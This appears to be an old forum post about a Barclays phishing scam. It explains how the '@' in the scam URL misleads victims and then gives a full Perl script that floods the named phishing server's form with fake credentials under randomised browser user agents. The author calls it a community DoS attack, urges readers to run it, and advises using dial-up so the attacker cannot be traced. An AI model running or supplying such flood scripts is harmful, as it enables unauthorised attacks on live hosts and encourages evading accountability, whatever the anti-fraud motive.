OK so we all get SPAM. Perhaps you are like me and occasionally toy with the idea of mail bombing the spammers servers. Perhaps you worry about hitting the wrong target. Perhaps you don't care that much.
For some reason today I decided to care. The subject was yet another SPAM from the Internet Banking Fraudsters who want you to confirm all your login details so they can empty your accounts. Sadly people do and are now losing out as the banks have issued warnings that effectively make it the client's problem.
So I got a new email today. Yet another bank scam. Here is the link purporting to be from Barclays bank and asking for all my user login details:
http://barclays.co.uk:ac-x6LC0IQr2aBda1XBALgF@dxp0fas94.CjB.NeT/?LdZJtDpTt8z1elD
Note the @ in the url (add one to a url if you don't know what it does ie http://here.com@go.there.com end up at go.there.com)
You end up with two windows. The main one is the REAL Barclays site but the pop up that comes before it is the scam: barcl.pisem.net/welcome3.html
Have a look at the source (it is ripped off from the ib.national.com.au scam - note that they have not even fixed the style sheet link)
If you feel in the mood to strike back then you might like to run this little script in the background for a while. All the script does is fill in the form with random data designed to look exactly like real data would. The desired result is to ruin the scam logs so if there is anyone stupid enough to fill in this form (there will be) their valid data should get lost in all this useless data. The random data should be identical to valid data making it impossible to automatically parse out:
#!/usr/bin/perl use LWP::UserAgent; my $ua = LWP::UserAgent->new; my $SLEEP = 1; my $DEBUG = 1; my $LOG_FILL = 20,000; # how many entries will we add to the scam log +? while(1) { my $IE = sprintf "%.1f", ( 5.0, 5.1, 5.5, 6.0, 6.1 )[rand(5)]; my $WIN = sprintf "%.1f", ( 4.0, 4.1, 5.1 )[rand(3)]; my $bs = join '', map{ ('a'..'z')[rand(26)] }1..(rand(5)+3); my $agent = "Mozilla/4.0 (compatible; MSIE $IE; Windows NT $WIN; $ +bs)"; $ua->agent( $agent ); $DEBUG && print $agent, $/; my $user = sprintf "%08d", rand(99999999); my $pass = sprintf "%05d", rand(99999); my $name = ucfirst join '', map{ ('a'..'z')[rand(26)] }1..(rand(5) ++3); my $word = join '', map{ ('a'..'z')[rand(26)] }1..(rand(3)+5); my $url = "http://barcl.pisem.net/obr2.html?name=$name&user=$user& +pass=$pass&word=$wordgo=hm&loginButton=%20%20Verify%20%20"; $DEBUG && print $url, $/; my $request = HTTP::Request->new( 'GET', $url ); my $response = $ua->request( $request ); $DEBUG && print $response->content; sleep $SLEEP; $LOG_FILL--; die "Done!\n" if $LOG_FILL == 0; }
Yes this is in effect a request for a community DOS attack. While I do not condone DOS it seems to me that if a few Internet savvy people examine the evidence, can make a positive ID, and can see a valid opportunity prevent to scams like this from making enough money to be worthwhile......why not? You WILL probably save at least one person from losing their life savings and that has to be a good thing.
Because of the warnings the banks are issuing anyone who fills in one of these forms and loses money has basically done their dough. This is theft pure and simple. Personally I think the banks ought to be DOSing these guys and hosing them off the Internet.
Don't get mad, get even
I suppose I could ask one of my more dubious assocites to take the server down but that would probably hurt inoccent users as well. Sure I have reported it to Barclays but the server is in russia so they will not really be able to stop it. They probably don't care as their disclamer makes it THE CLIENTS problem. If everyone who knows a little Perl and gets these emails was to respond likewise we could put these creeps out of business in a week. Minimum collateral damage and it should really annoy the scamsters. Do it from dial up and they will never be able to track you down either. I would not run it from a fixed IP cause they will probably be pretty pissed off.